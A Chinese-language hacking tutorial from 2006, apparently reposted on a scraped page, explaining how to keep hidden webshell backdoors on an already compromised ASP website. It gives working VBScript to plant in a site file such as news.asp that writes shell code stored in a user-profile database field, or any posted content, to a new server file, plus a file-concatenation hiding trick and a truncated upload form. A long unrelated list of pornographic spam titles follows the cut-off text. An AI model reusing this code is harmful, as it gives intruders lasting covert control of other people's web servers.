教你巧妙利用.mdb后綴數據庫做后門
2006/11/10 9:23:33
前言:好長時間了,從剛開始的站點管理器到現在流行的幾款asp后門,相信大多網管都能說出這些經典webshell的名字,如海洋、老兵、藍屏等,也相信大多數的網管學會了關鍵字的搜索方法來搜索這些木馬,當然現在的時間如果再象隱藏后門就要講些技巧啦,俗話說的好“佛高一尺,我高一丈”。
我不否認n早前的那個把asp木馬寫到圖片文件中不失為一種好的方法,其實不僅可以寫到圖片啦寫到mp3文件里寫到doc文件里都是可以的啦。
copy 文件名/參數 + 文件名/參數 生成文件名
這樣的方法可以很靈活的運用來達到隱藏文件的目的,具體的參數就是/a以acsic碼方式,/b二進制方式,就不羅嗦這些了,至于如何上傳webshell,什么是webshell也不屬于本文的討論范圍。今天要講的是如何把后門放到后綴.mdb的數據庫中,前提是在我們拿到一個webshell之后……
我們所知道的,很多站點在用戶注冊的時候要讓填好多東西例如:用戶名、密碼、QQ、郵箱、個人簡介、電話、聯系方式、住址一類的。而對應到數據庫中也都會有相應的表、字段、值。我今天要做的就是,我注冊一個用戶在我的個人簡介的地方上寫入shell代碼,然后修改他站點上的一個文件,使用的時候觸發這個文件,就把我個人簡歷中的shell代碼,備份到當前目錄下。
廢話少說了,大家看代碼:
<%
if request("action")="firefox" then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
rs.open sql,conn,1,3
if not rs.eof then
content=rs(bname)
else
response.write "Nothing"
end if
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
end if
%>
將上邊的代碼加到站點的一個文件中,如news.asp。根據我們了解的信息,在其站點注冊后,下載數據庫看結構。我注冊的firefox名字是在 user表,其id值為119 用于存放我注冊簡歷的表字段為jl。
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
那么在使用的時候我們就可以在news.asp相同目錄下寫入一個名為 firefox.asp的webshell。以上可以說是萬千隱藏方法中的一種,下邊再說另外一種更方便的隱藏方法,這個方法就和mdb后綴無關系了。
同樣我們還是修改news.asp,將以下代碼插入到對方news.asp中:
<%
if request("action")="firefox" then
n=request.form("n")
c=request.form("c")
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
end if
%>
這段代碼相對簡單些,算是一個木馬的服務端吧。使用的時候以這段代碼配合:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>F.s.t火狐技術聯盟[www.wrsky.com]</title>
<FORM action="http://localhost/config.asp?action ... method=post>
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>Name:<INPUT size=50
name=n width="32"><BR><BR>Shell:<TEXTAREA na
下一頁
返回列表
返回首頁
主站蜘蛛池模板:
中文字字幕码一二区|
国产裸体歌舞一区二区|
乱色精品无码一区二区国产盗|
男人j放进女人j网站免费|
国产精品亚洲四区在线观看|
www五月婷婷|
极品粉嫩小泬白浆20p|
亚洲色大成网站www永久男同|
美女被免费网站在线视|
国产妇女馒头高清泬20p多|
香蕉视频黄在线观看|
处破痛哭A√18成年片免费|
一边摸下面一别吃奶|
欧美一级片在线观看|
亚洲精品国产av成拍色拍|
精品69久久久久久99|
国产99久久精品一区二区|
黄网站色成年片大免费高清|
国产精品免费看久久久久|
97免费人妻在线视频|
女人扒开裤子让男人捅|
两个人看的www高清免费视频|
日本人视频-jlzzjlzzjlzz|
亚洲精品无码久久毛片|
精品久久久久香蕉网|
四虎AV永久在线精品免费观看
|
黄色毛片在线播放|
国产精品东北一极毛片|
91精品欧美成人|
夜夜影院未满十八勿进|
www久久精品|
影音先锋女人aa鲁色资源|
中文字幕在线永久视频|
日本一道高清一区二区三区|
久久精品无码专区免费东京热|
欧美va亚洲va在线观看|
亚洲国产精品久久久久婷婷软件
|
jizz中文字幕|
国产精品边做奶水狂喷小说|
99久久无色码中文字幕人妻|
天天狠狠色综合图片区|